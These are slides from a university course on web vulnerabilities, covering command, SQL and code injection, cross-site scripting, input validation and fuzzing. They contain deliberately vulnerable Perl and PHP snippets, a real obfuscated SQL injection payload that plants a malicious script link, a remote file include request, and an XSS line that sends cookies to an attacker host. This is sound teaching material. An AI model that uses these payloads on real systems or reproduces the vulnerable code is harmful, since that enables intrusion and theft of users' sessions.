CIS 433/533 - Computer and Network Security. Web Vulnerabilities, Wrapup

CIS 433/533 - Computer and Network Security Web Vulnerabilities, Wrapup Professor Kevin Butler Winter 2011 Computer and Information Science

Injection Attacks flaws relating to invalid input handling which then influences program execution often when passed as a parameter to a helper program or other utility or subsystem most often occurs in scripting languages encourage reuse of other programs / modules often seen in web CGI scripts

Unsafe Perl Script 1 #!/usr/bin/perl 2 # finger.cgi - finger CGI script using Perl5 CGI module 3 4 use CGI; 5 use CGI::Carp qw(fatalstobrowser); 6 $q = new CGI; # create query object 7 8 # display HTML header 9 print $q->header, 10 $q->start_html('finger User'), 11 $q->h1('finger User'); 12 print "<pre>"; 13 14 # get name of user and display their finger details 15 $user = $q->param("user"); 16 print `/usr/bin/finger -sh $user`; 17 18 # display HTML footer 19 print "</pre>"; 20 print $q->end_html;

Safer Script counter attack by validating input compare to pattern that rejects invalid input see example additions to script: 14 # get name of user and display their finger details 15 $user = $q->param("user"); 16 die "The specified user contains illegal characters!" 17 unless ($user =~ /^\w+$/); 18 print `/usr/bin/finger -sh $user`;

SQL Injection another widely exploited injection attack when input used in SQL query to database similar to command injection SQL meta-characters are the concern must check and validate input for these $name = $_REQUEST['name']; $query = SELECT * FROM suppliers WHERE name = '". $name. "';" $result = mysql_query($query); $name = $_REQUEST['name']; $query = SELECT * FROM suppliers WHERE name = '". mysql_real_escape_string($name). "';" $result = mysql_query($query);

Consequences When SQL injection goes bad... 6

Real SQL Injection orderitem.asp?it=gm-204;declare%20@s%20nvarchar(4000);set%20@s=cast(0x440045 0043004C00410052004500200040005400200076006100720063006800610072002800320035 00350029002C0040004300200076006100720063006800610072002800320035003500290020 004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F 007200200043005500520053004F005200200046004F0052002000730065006C006500630074 00200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D 0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F 006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D 0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075 002700200061006E0064002000280062002E00780074007900700065003D003900390020006F 007200200062002E00780074007900700065003D003300350020006F007200200062002E0078 0074007900700065003D0032003300310020006F007200200062002E00780074007900700065 003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075 00720073006F00720020004600450054004300480020004E004500580054002000460052004F 004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054 004F002000400054002C004000430020005700480049004C0045002800400040004600450054 00430048005F005300540041005400550053003D0030002900200042004500470049004E0020 0065007800650063002800270075007000640061007400650020005B0027002B00400054002B 0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740072 0069006D00280063006F006E007600650072007400280076006100720063006800610072002C 005B0027002B00400043002B0027005D00290029002B00270027003C00730063007200690070 00740020007300720063003D0068007400740070003A002F002F007700770077002E006E00 6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F00 7300630072006900700074003E0027002700270029004600450054004300480020004E0045 00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073 006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000 43004C004F005300450020005400610062006C0065005F0043007500720073006F0072002000 4400450041004C004C004F00430041005400450020005400610062006C0065005F00430075 00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 7

Decoded result: DECLARE @T varchar(255)'@c varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE (@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')fetch NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Redirects to malicious domain where 8 different browser exploits are launched 8

Code Injection further variant input includes code that is then executed see PHP remote code injection vulnerability variable + global field variables + remote include this type of attack is widely exploited <?php include $path. 'functions.php'; include $path. 'data/prefs.php'; GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls

Cross Site Scripting Attacks attacks where input from one user is later output to another user XSS commonly seen in scripted web apps with script code included in output to browser any supported script, e.g. Javascript, ActiveX assumed to come from application on site XSS reflection malicious code supplied to site subsequently displayed to other users

XSS Example guestbooks, wikis, blogs etc where comment includes script code e.g. to collect cookie details of viewing users need to validate data supplied including handling various possible encodings attacks both input and output handling Thanks for this information, its great! <script>document.location='http://hacker.web.site/cookie.cgi?'+ document.cookie</script>

Validating Input Syntax to ensure input data meets assumptions e.g. is printable, HTML, email, userid etc compare to what is known acceptable not to known dangerous as can miss new problems, bypass methods commonly use regular expressions pattern of characters describe allowable input details vary between languages bad input either rejected or altered

Input Fuzzing powerful testing method using a large range of randomly generated inputs to test whether program/function correctly handles abnormal inputs simple, free of assumptions, cheap assists with reliability as well as security can also use templates to generate classes of known problem inputs could then miss bugs, so use random as well

Wrapup So, what does it all mean? 14

The state of security issues are in public consciousness Press coverage is increasing Losses mounting (billions and billions) Affect increasing (ATMs, commerce) Public is at risk... What are we doing? sound and fury signifying nothing (well, its not quite that bad) 15

The problems What is the root cause? Security is not a key goal...... and it never has been...... so, we need to figure out how to change the way we do engineering (and science)...... to make computers secure. Far too much misunderstanding about basic security and the use of technology (security theatre) 16

The current solutions Make better software we mean it - B. Gates (2002) no really - B. Gates (2003) Linux/OS X/Sun OS etc. is bad too - B. Gates (2005) Vista will fix everything - B. Gates (2006) Vista fixes everything - B. Gates (2007) Sorry about Vista... - B. Gates (2007.5) Windows 7.0 will fix everything - B. Gates (2008) CERT/SANS-based problem/event tracking Experts tracking vulnerabilities Patch system completely broken Destructive research Back-pressure on product developers Arms-race with bad guys Problem: reactive, rather than proactive 17

The real solutions Fix the economic incentive equation Eventually, MS/Sun/Apple/*** will be in enough pain that they change the way they make software Education Things will get better when people understand when how to use technology Fix engineering practices Design for security Apply technology What we have been talking about 18

Your new skills arsenal A little knowledge is a dangerous thing More and more, real lives at stake through subverting computers With great power comes great responsibility 19

The bottom line The Web/Internet and new technologies have limited ability to address security and privacy concerns computer science is making the world less safe!! it is incumbent on us as scientists to meet these challenges. Evangelize importance of security Provide sound technologies Define better practices 20

Computer and Information Science Thank You!!!